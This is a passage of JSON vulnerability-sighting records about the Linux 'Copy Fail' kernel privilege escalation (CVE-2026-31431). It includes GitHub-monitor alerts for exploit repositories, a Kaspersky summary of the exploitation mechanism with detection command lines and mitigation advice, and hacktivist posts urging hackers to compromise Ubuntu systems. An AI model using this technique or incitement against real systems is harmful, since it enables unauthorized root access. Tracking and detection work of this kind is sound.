CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a HulnotHutu\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 08:48:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u5bf9 CVE-2026-31431 \u7684\u590d\u73b0\u5206\u6790\u3001C \u6539\u7f16\u7684 exp\u3002\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T09:00:04.000000Z"}, {"uuid": "ab57514e-18c6-43ae-a3de-7654c4f2e959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/VZeeypARXkvMlULXcP2IjG4vReJ0t9VhcOi0vz0KF3ybbfY", "content": "", "creation_timestamp": "2026-05-01T21:00:04.000000Z"}, {"uuid": "4ed23d9a-3616-49da-b127-07ce02c041fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/7QlwzNIR_X5g9vTBRsuXOB5NZOCwzi6d7HbUehnl_JOO7Qs", "content": "", "creation_timestamp": "2026-05-02T03:00:04.000000Z"}, {"uuid": "2166fef8-c7ef-4595-b83d-2c862ee48a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/Pn0o2pCSOYvgO1iCuzKUDmBM3bN6kcVxb6taAGbSrxeSQWE", "content": "", "creation_timestamp": "2026-05-01T11:00:13.000000Z"}, {"uuid": "deaafdca-b2e6-4d06-83f0-46a1f2f77277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/IgMXaUeI6SNBAHCh-M4SenGrw1gGeF6CA1UICLI_4bYZDIs", "content": "", "creation_timestamp": "2026-05-01T15:00:06.000000Z"}, {"uuid": "ec0d8629-3aa3-4700-bc23-b07c01ea1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/bldpaU4Fd3K5P_BYQnPbX8yM0aEM2e48CWOaj1lIbI-n9P0", "content": "", "creation_timestamp": "2026-05-01T15:00:14.000000Z"}, {"uuid": "4ff53f86-fcac-4c4c-9fc8-c24639209548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/Bh4iyBQIMN2Hl9Jl9GcG_tuPw1Psk_odE0qn4w68HKrpiOc", "content": "", "creation_timestamp": "2026-05-01T03:00:05.000000Z"}, {"uuid": "e603fb90-d509-4758-8601-597c6cf875d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mkyqmzp7ep2q", "content": "The latest update for #Mendit includes \"PhantomRaven Wave 5: New Undocumented NPM #SupplyChain Campaign Targets DeFi, #Cloud, and AI Developers\" and \"CVE-2026-31431 (Copy Fail): #Linux Kernel LPE\".\n \n#CyberSecurity #DevOps #OpenSource #Compliance https://opsmtrs.com/3zEYo7d", "creation_timestamp": "2026-05-04T03:37:22.796226Z"}, {"uuid": "3c8d5a7e-6492-4932-b97c-3dbcb69fcaa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mkysl5ppik2h", "content": "Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux www.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-04T04:12:09.994475Z"}, {"uuid": "43a3e76b-c0b3-4dd7-9c46-b7a484cc009a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/c3iq.bsky.social/post/3mkyue4wbfs2a", "content": "Some have suggested that CVE-2026-31431 is a backdoor. What if all the backdoors are found?", "creation_timestamp": "2026-05-04T04:43:58.863859Z"}, {"uuid": "1b6bea9d-72e2-4ed9-a9dd-c982da799ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82481", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a suominen\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Nix\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 12:59:31\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nTracking CVE-2026-31431 (Copy Fail)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T13:00:04.000000Z"}, {"uuid": "71cb26c3-3233-40af-809f-1402c5441f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82487", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a autorootlinux\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Huchangzhi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 13:53:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u57fa\u4e8eCVE-2026-31431\u7684\u81ea\u52a8root\u811a\u672c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T14:00:04.000000Z"}, {"uuid": "99e95589-a0e7-4dba-a09e-6863608d89c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/xX313XxTeam/1104", "content": "\u0647\u0630\u0627 \u0647\u0648\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2026-31431 \u0628\u0623\u0633\u0645 Copy Fail \u0646\u0646\u0635\u062d \u0627\u0644\u062c\u0645\u0628\u0639 \u0628\u0623\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0623\u062e\u062a\u0631\u0627\u0642 \u0627\u0646\u0638\u0645\u0629 Ubuntu \u0628\u0639\u062f \u0641\u0634\u0644 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0627\u0646\u0638\u0645\u0629 \u0628\u0633\u0628\u0628 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0630\u064a \u0646\u0641\u0630\u062a\u0647 \u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642 - \u0641\u0631\u064a\u0642 313 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Ubuntu \u0648\u062a\u0639\u0637\u064a\u0644\u0647\u0627 \u0628\u0627\u0644\u0643\u0627\u0645\u0644.\nThis is the exploit for the vulnerability CVE-2026-31431, codenamed \"Copy Fail.\" We recommend that everyone utilize it to compromise Ubuntu systems, following the failure of system updates caused by the attack executed by the Islamic Cyber \u200b\u200bResistance in Iraq \u2013 313 Team against Ubuntu's infrastructure, which resulted in its complete disablement.\n\n313 Team | BackUp | Beamed\n\n\u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642\n\u0641\u0631\u064a\u0642 313\n#313_Team\n#Beamed_Network", "creation_timestamp": "2026-05-02T19:45:38.000000Z"}, {"uuid": "aea83453-f72e-4de5-bafc-13d621a6d93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/xX313XxTeam/1101", "content": "\u0627\u0644\u0627\u0646 \u062a\u0646\u0641\u0630 \u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642 - \u0641\u0631\u064a\u0642 313 \u0647\u062c\u0648\u0645 \u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0636\u062e\u0645 \u064a\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0645\u0643\u0648\u0646\u0627\u062a \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0644\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u0627\u0633\u0627\u0633\u064a\u0629 \u0644\u0640Ubuntu \u0648\u0627\u0644\u0627\u0646 \u0644\u0627 \u064a\u0645\u0643\u0646 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0639\u0627\u062f\u064a\u0629 \u0644\u0627 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0645\u0646\u064a\u0629 \u0644\u0627 \u062a\u062b\u0628\u064a\u062a \u0644\u0644\u0628\u0631\u0627\u0645\u062c \u0648 CI/CD \u0627\u0646\u0647\u0627\u0631 \u0648\u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u062a\u062a\u0648\u0642\u0641 \u062a\u062f\u0631\u064a\u062c\u064a\u0627\u064b\u060c \u0633\u064a\u0633\u062a\u0645\u0631 \u0644\u0645\u062f\u0629 8 \u0633\u0627\u0639\u0627\u062a \u0648\u0642\u062f \u064a\u0645\u062a\u062f \u0627\u0644\u0647\u062c\u0648\u0645 \u0644\u0645\u062f\u0629 \u0627\u0637\u0648\u0644.\n\u0628\u0639\u062f \u062a\u0648\u0642\u0641 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0627\u0645\u0627\u0646 \u0646\u0646\u0635\u062d \u0627\u0644\u0645\u062e\u062a\u0631\u0642\u064a\u0646 \u0628\u0628\u062f\u0627\u0621 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2026-31431 \u0648\u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0628\u0623\u0633\u0645 Copy Fail \u0644\u0627\u0646 \u0627\u063a\u0644\u0628 \u0627\u0644\u0627\u0646\u0638\u0645\u0629 \u0627\u0644\u0627\u0646 \u062a\u0639\u0627\u0646\u064a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u062b\u063a\u0631\u0629 \u0628\u0639\u062f \u062a\u0639\u0637\u0644 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0627\u0645\u0627\u0646 \u0648\u062a\u0639\u0637\u0644 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u064a \u0627\u0646 \u0627\u0646\u0638\u0645\u0629 Ubuntu \u0627\u0644\u0627\u0646 \u0641\u0631\u064a\u0633\u0647 \u0633\u0647\u0644\u0647 \u0644\u0644\u0645\u062e\u062a\u0631\u0642\u064a\u0646.\nThe Islamic Cyber \u200b\u200bResistance in Iraq \u2013 313 Team is currently executing a massive cyberattack targeting key components of the Ubuntu infrastructure. Consequently, standard updates, security patches, and software installations are currently impossible; CI/CD pipelines have collapsed, and the infrastructure is gradually grinding to a halt. This disruption is expected to last for eight hours, though the attack may potentially extend for a longer duration.\nFollowing the suspension of security updates, we advise hackers to begin exploiting vulnerability CVE-2026-31431\u2014known as \"Copy Fail.\" This is because the majority of systems are now susceptible to this flaw due to the disruption of security updates and software installations, rendering Ubuntu systems easy prey for hackers.\n\n313 Team | BackUp | Beamed\n\n\u0627\u0644\u0645\u0642\u0627\u0648\u0645\u0629 \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0639\u0631\u0627\u0642\n\u0641\u0631\u064a\u0642 313\n#313_Team\n#Beamed_Network", "creation_timestamp": "2026-05-02T19:45:30.000000Z"}, {"uuid": "2064b7f5-5089-41cc-b1b2-d68d5d40b42f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82538", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pulentoski\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 23:58:57\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T00:00:05.000000Z"}, {"uuid": "af7b6510-cae1-4a91-9130-5ad5a76d75c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/kasperskyb2b/2157", "content": "\u041d\u0430 \u0434\u043d\u044f\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-31431 (CopyFail) \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0421\u0443\u0442\u044c \u0443\u0437\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u0438: \n\n\u041a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c authencesn \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0447\u0430\u0441\u0442\u044c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u00ab\u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\u0430\u00bb \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u0435 \u0431\u0430\u0439\u0442\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043a\u0435\u0448\u0430 \u0444\u0430\u0439\u043b\u0430. \u042d\u0442\u043e \u0434\u0430\u0451\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043a\u0435\u0448 \u043b\u044e\u0431\u043e\u0433\u043e \u0447\u0438\u0442\u0430\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430. \n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 732-\u0431\u0430\u0439\u0442\u043d\u044b\u0439 Python-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 AF_ALG \u0438 splice \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0447\u0435\u0442\u044b\u0440\u0451\u0445 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442 \u0432 \u043a\u0435\u0448, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, setuid-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u043a\u043e\u0434 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0448\u0435\u043b\u043b \u0441 \u0440\u0443\u0442\u043e\u0432\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438. \n\n\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c:\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u044f\u0434\u0440\u043e, \u0430 \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u2014 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c algif_aead (\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 AF_ALG \u0434\u043b\u044f AEAD).\n\n\u041a\u0430\u043a \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443: \n\n\u0410\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u043d\u0430 Python \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0435 \u0432\u044b\u0448\u0435.  \u0417\u0430\u043f\u0443\u0441\u043a \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u043c \u0441\u0442\u0440\u043e\u043a\u0430\u043c:\n \nsh -c -- su\nsh -c -- newgrp\nsh -c -- passwd\nsh -c -- gpasswd\nsh -c -- sudo\nsh -c -- chfn\nsh -c -- umount\nsh -c -- mount\nsh -c -- fusermount3\nsh -c -- chsh\nsh -c -- su\n\n\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 setuid-\u0444\u0430\u0439\u043b\u0430\u043c\u0438. \u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443 \u043f\u043e \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e\u0439 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432: Python \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 Shell. \n\n\u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0443\u0436\u0435 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0434\u0440\u0443\u0433\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432, \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c\u0441\u044f. \u0421\u043b\u0435\u0434\u0438\u0442\u0435 \u0437\u0430 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043e\u0442 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043b\u0438\u0431\u043e \u0444\u0430\u0439\u043b\u043e\u0432, \u043d\u0435\u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0445 \u0434\u043b\u044f \u0432\u0430\u0448\u0435\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.", "creation_timestamp": "2026-04-30T14:30:05.000000Z"}, {"uuid": "d812ee57-dfd1-4967-9f24-2af8503639a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82552", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jbnetwork-git\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 00:40:42\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431  Helper basado en https://copy.fail/\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T01:00:05.000000Z"}, {"uuid": "e54bfc0b-7e23-458f-8e97-c4f38728d723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ctinow/249645", "content": "CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments\nhttps://ift.tt/DoaNdPk", "creation_timestamp": "2026-05-02T03:54:20.000000Z"}, {"uuid": "9305f015-a50e-4ae3-9feb-c7ba8b53d5a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/L4sKdvuAMq3ugqIKlVfY5v_-kzPZgLFDy0BVpy-19DgU_A", "content": "", "creation_timestamp": "2026-04-30T13:36:52.000000Z"}, {"uuid": "418c9fe0-74b4-4c17-86b5-7c2f3bf8a554", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82566", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-Fail-CVE-2026-31431-Linux-exp-tools-C-EXP\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a YuCc777\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 03:22:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail-CVE-2026-31431&Linux \u63d0\u6743\u5de5\u5177&Linux-exp-tools&C-EXP\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T04:00:03.000000Z"}, {"uuid": 